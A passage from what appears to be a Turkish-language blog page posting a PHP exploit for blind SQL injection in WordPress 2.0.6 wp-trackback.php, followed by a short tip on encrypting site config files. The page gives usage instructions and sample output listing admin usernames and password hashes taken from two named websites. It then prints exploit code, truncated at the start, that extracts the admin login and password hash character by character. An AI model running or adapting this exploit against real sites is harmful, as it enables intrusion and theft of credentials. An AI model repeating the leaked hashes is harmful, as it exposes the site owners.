Labels
Wikipedia
Arama sonuçları
Popular Posts
-
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Sql Yaparak Admin Hash Ulasabilirsiniz... C:\php> php wordpressexploit.php t...
Giriş Yap
Google Hesabınızla oturum açın
Become a Fan
Followers
21 Ekim 2015 Çarşamba
Wordpress 2.0.6wp-trackback.php Remote SQL Injection
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection
Sql Yaparak Admin Hash Ulasabilirsiniz...
C:\php> php wordpressexploit.php target.com/blog/ seklinde
Ornek : poseurink.com
username: poseurin
passhash: 583299ff41b22577ba8c2f454de89cd7
macsmind.com
username: admin
passhash: 7678a9aad1b1b68d94df241128b70bc7
C:\php> php wordpressexploit.php target.com/blog/ seklinde
Ornek : poseurink.com
username: poseurin
passhash: 583299ff41b22577ba8c2f454de89cd7
macsmind.com
username: admin
passhash: 7678a9aad1b1b68d94df241128b70bc7
126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if
(strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.="
0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n";
$exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex =
'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) {
global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from
'.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo
'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to
".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) {
echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html='';
while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } }
fclose($ock); } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy="";
$prefix="wp_"; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if
($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") {
$proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-t") {$prefix=str_replace("-t","",$argv[$i]); } } if (($path[0]<>'/') or
($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='')
{$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters function my_encode($my_string)
{ $encoded="CHAR("; for ($k=0; $k<=strlen($my_string)-1; $k++) {
$encoded.=ord($my_string[$k]); if ($k==strlen($my_string)-1) {$encoded.=")";} else
{$encoded.=",";} } return $encoded; } echo "\npwd hash -> "; $j=1;$password="";
while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) {
$sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))="
.$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**
/WHERE/**/ID=1/*"; $data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"url\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"blog_name\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"tb_id\";\r\n\r\n"; $data.="$sql\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"1740009377\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"496546471\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e--\r\n"; $packet ="POST ".$p."wptrackback.php?tb_id=1 HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d61bcd1f033e\r\n"; $packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n";
$packet.=$data; sendpacketii($packet); if (!eregi("trackbacks are closed",$html))
{$password.=chr($i);echo chr($i);sleep(1);break;} } if ($i==255) { die("\nExploit
failed..."); } } $j++; } echo "\n"; echo "admin user -> "; $j=1;$admin=""; while
(!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) {
$sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=
".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/*
*/WHERE/**/ID=1/*"; $data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"url\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"blog_name\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"tb_id\";\r\n\r\n"; $data.="$sql\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"1740009377\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n"; $data.="Content-Disposition: formdata; name=\"496546471\";\r\n\r\n"; $data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e--\r\n"; $packet ="POST ".$p."wptrackback.php?tb_id=1 HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d61bcd1f033e\r\n"; $packet.="Host: ".$host."\r\n";$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n";
$packet.=$data; sendpacketii($packet); if (!eregi("trackbacks are closed",$html))
{$admin.=chr($i);echo chr($i);sleep(1);break;} if ($i==255) { die("\nExploit failed..."); }
} $j++; } echo "\n"; function is_hash($hash) { if (ereg("([a-f0-9]{32})",trim($hash)))
{return true;} else {return false;} } if (is_hash($password)) { echo "exploit
succeeded..."; } else { echo "exploit failed..."; } ?> Veritabanı Güvenliği
Config dosyalarını şifrelemek, sitenizin ayar dosyalarını şifrelerseniz kötü amaçlı kişiler
ftpden yada fso ile sitenize girse bile config dosyalarınızı şifreleyerek veritabanı bilgilerine
ulaşmalarını engelleyebilirsiniz bunu sağlarsanız %100 veritabanınız güvenli hale gelir.
Config dosyalarınızı şifrelemek için SourceCop programını kullanın aşşağıda download linkini verdim programı açıp orda php yi seçin sonra C sürücünüzde bir klasör oluşturun içine config.php veya sitenizin ayar dosyasının adı neyse onu koyun sonra sourcecop programında Select Source Folder tuşuna basıp c sürücüsünde oluşturduğunuz klasörü seçin ve Encrypt tuşuna basın bukadar sonra oluşturduğunuz klasörün içindeki ayar dosyası ile birlikte scopbin klasörünü sitenizde uygun yere yükleyin bundan sonra sitenizin komple çekseler bile veritabanına ulaşamazlar.
Takıldığınız yerde yorum yaparak bilgi alabilirsiniz.
Bu paylaşım tamamen http://blognotla.blogspot.com/
İndirilmiştir ve bütün hakları
http://blognotla.blogspot.com/ 'a aittir
Config dosyalarınızı şifrelemek için SourceCop programını kullanın aşşağıda download linkini verdim programı açıp orda php yi seçin sonra C sürücünüzde bir klasör oluşturun içine config.php veya sitenizin ayar dosyasının adı neyse onu koyun sonra sourcecop programında Select Source Folder tuşuna basıp c sürücüsünde oluşturduğunuz klasörü seçin ve Encrypt tuşuna basın bukadar sonra oluşturduğunuz klasörün içindeki ayar dosyası ile birlikte scopbin klasörünü sitenizde uygun yere yükleyin bundan sonra sitenizin komple çekseler bile veritabanına ulaşamazlar.
Takıldığınız yerde yorum yaparak bilgi alabilirsiniz.
Kaydol:
Yorumlar
(Atom)